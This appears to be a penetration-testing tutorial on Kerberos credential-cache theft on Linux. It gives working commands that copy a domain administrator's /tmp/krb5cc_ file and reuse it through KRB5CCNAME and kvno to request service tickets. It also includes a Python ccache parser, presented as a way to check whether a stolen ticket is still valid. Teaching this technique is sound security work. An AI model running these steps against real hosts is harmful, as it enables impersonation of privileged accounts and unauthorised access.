Credential Cache Files

If we compromise an active user's shell session, we can act as that user and reuse the Kerberos tickets already in their credential cache. Obtaining a fresh TGT would require the user's Active Directory password, but if the user is already authenticated we can simply use the tickets they hold.

A user's ccache file is stored in /tmp and its name starts with /tmp/krb5cc_ (as in the listing further down, the name includes the owner's numeric user id).

The file is created with mode 0600, so only its owner can read it. As an unprivileged user we are therefore unlikely to be able to steal another user's ccache file.

Note that even as root you may not be able to access other users' cache files in /tmp. Start by listing the caches that exist:

ls -al /tmp/krb5cc_*

/tmp/krb5cc_607000500_3aeIA5

Copy the domain administrator's ccache file and make our offsec user the owner of the copy. The copy is created by root, so the chown is what lets our non-root shell read it.

sudo cp /tmp/krb5cc_607000500_3aeIA5 /tmp/krb5cc_minenow
sudo chown offsec:offsec /tmp/krb5cc_minenow

In order to use the ccache file, we point the KRB5CCNAME environment variable at it. Run kdestroy first: it removes our own offsec cache, and running it after the export would delete the stolen copy instead.

kdestroy
export KRB5CCNAME=/tmp/krb5cc_minenow

We now have the administrator's TGT in our credential cache (klist shows it) and can request service tickets on their behalf, for example for the MSSQL service on DC01:

kvno MSSQLSvc/DC01.corp1.com:1433
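Before relying on a copied cache, it is worth checking offline what it actually holds: which principal it belongs to and whether its TGT has already expired. The following is an added example, not code from the original page, that builds and parses an MIT Kerberos FILE ccache in format version 4 (the format behind /tmp/krb5cc_* files; KEYRING and KCM caches are not files and are not covered). The principal administrator@CORP1.COM, the session key, ticket bytes, timestamps and the helper names parse_ccache, build_ccache and find_tgt are all the example's own constructions, not krb5 tooling.

```python
"""Added example (not from the original page): build and parse MIT Kerberos
FILE credential caches (format version 4) so a copied /tmp/krb5cc_* file can
be inspected offline. Field layout follows MIT krb5's documented ccache
format; every sample value below is constructed for the example."""
import struct
import sys

FORMAT_VERSION = b"\x05\x04"   # ccache version 4, all integers big-endian
TAG_DELTATIME = 1              # header tag: KDC time offset (tag, len, sec, usec)


def _put_data(b: bytes) -> bytes:
    return struct.pack(">I", len(b)) + b


def _put_principal(name: str, name_type: int = 1) -> bytes:
    # "comp1/comp2@REALM" -> name_type, num_components, realm, components
    parts, realm = name.split("@")
    comps = parts.split("/")
    out = struct.pack(">II", name_type, len(comps)) + _put_data(realm.encode())
    return out + b"".join(_put_data(c.encode()) for c in comps)


def build_ccache(default_principal: str, creds: list) -> bytes:
    """Serialise a version-4 ccache holding the given credential records."""
    header = struct.pack(">HHii", TAG_DELTATIME, 8, 0, 0)
    out = FORMAT_VERSION + struct.pack(">H", len(header)) + header
    out += _put_principal(default_principal)
    for c in creds:
        out += _put_principal(c["client"]) + _put_principal(c["server"])
        out += struct.pack(">HI", c["enctype"], len(c["key"])) + c["key"]  # keyblock
        out += struct.pack(">IIII", *c["times"])    # authtime, starttime, endtime, renew_till
        out += b"\x00"                              # is_skey
        out += struct.pack(">I", c["flags"])        # ticket_flags
        out += struct.pack(">II", 0, 0)             # num_address, num_authdata
        out += _put_data(c["ticket"]) + _put_data(b"")  # ticket, second_ticket
    return out


class _Reader:
    def __init__(self, data: bytes):
        self.data, self.pos = data, 0

    def take(self, n: int) -> bytes:
        if self.pos + n > len(self.data):
            raise ValueError("truncated ccache")
        chunk = self.data[self.pos:self.pos + n]
        self.pos += n
        return chunk

    def u16(self): return struct.unpack(">H", self.take(2))[0]
    def u32(self): return struct.unpack(">I", self.take(4))[0]
    def data_(self): return self.take(self.u32())
    def eof(self): return self.pos >= len(self.data)

    def principal(self) -> str:
        self.u32()                              # name_type, not needed here
        n = self.u32()
        realm = self.data_().decode()
        return "/".join(self.data_().decode() for _ in range(n)) + "@" + realm


def parse_ccache(data: bytes) -> dict:
    """Return the default principal and every credential record in the cache."""
    r = _Reader(data)
    if r.take(2) != FORMAT_VERSION:
        raise ValueError("only ccache format version 4 is supported")
    hdr = _Reader(r.take(r.u16()))
    while not hdr.eof():                        # skip header tags (DeltaTime)
        hdr.u16()
        hdr.take(hdr.u16())
    result = {"default_principal": r.principal(), "creds": []}
    while not r.eof():
        c = {"client": r.principal(), "server": r.principal()}
        c["enctype"] = r.u16()
        c["key"] = r.data_()                    # keylen (32 bits) + key bytes
        c["authtime"], c["starttime"], c["endtime"], c["renew_till"] = [r.u32() for _ in range(4)]
        r.take(1)                               # is_skey
        c["flags"] = r.u32()
        for _ in range(r.u32()):                # addresses: addrtype (16 bits) + data
            r.u16(); r.data_()
        for _ in range(r.u32()):                # authdata: ad_type (16 bits) + data
            r.u16(); r.data_()
        c["ticket"] = r.data_()
        r.data_()                               # second_ticket
        result["creds"].append(c)
    return result


def find_tgt(parsed: dict, now: int):
    """(server, endtime, still_valid) for the cache's TGT, or None if there is none."""
    realm = parsed["default_principal"].split("@")[1]
    for c in parsed["creds"]:
        if c["server"] == f"krbtgt/{realm}@{realm}":
            return c["server"], c["endtime"], c["endtime"] > now
    return None


# Constructed sample: an administrator TGT issued 2024-01-01 00:00 UTC, 10 h lifetime.
AUTH = 1704067200
SAMPLE_CCACHE = build_ccache("administrator@CORP1.COM", [{
    "client": "administrator@CORP1.COM",
    "server": "krbtgt/CORP1.COM@CORP1.COM",
    "enctype": 18,                          # aes256-cts-hmac-sha1-96
    "key": b"\x11" * 32,                    # constructed session key
    "times": (AUTH, AUTH, AUTH + 36000, AUTH + 7 * 86400),
    "flags": 0x40E00000,                    # forwardable, renewable, initial, pre-authent
    "ticket": b"constructed-ticket-bytes",  # a real cache holds the ASN.1 Ticket here
}])

if __name__ == "__main__":
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else SAMPLE_CCACHE
    parsed = parse_ccache(data)
    print("default principal:", parsed["default_principal"])
    for c in parsed["creds"]:
        print(f"  {c['server']}  enctype={c['enctype']}  endtime={c['endtime']}")
```

Run it with the copied cache as its only argument (for example the /tmp/krb5cc_minenow copy from above) to list the principal and every cached ticket with its expiry; without an argument it parses the constructed sample. A krbtgt/REALM@REALM record is the TGT, and find_tgt compares its endtime against the current time, which tells you whether the copy is still usable before you set KRB5CCNAME and start requesting service tickets with it.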
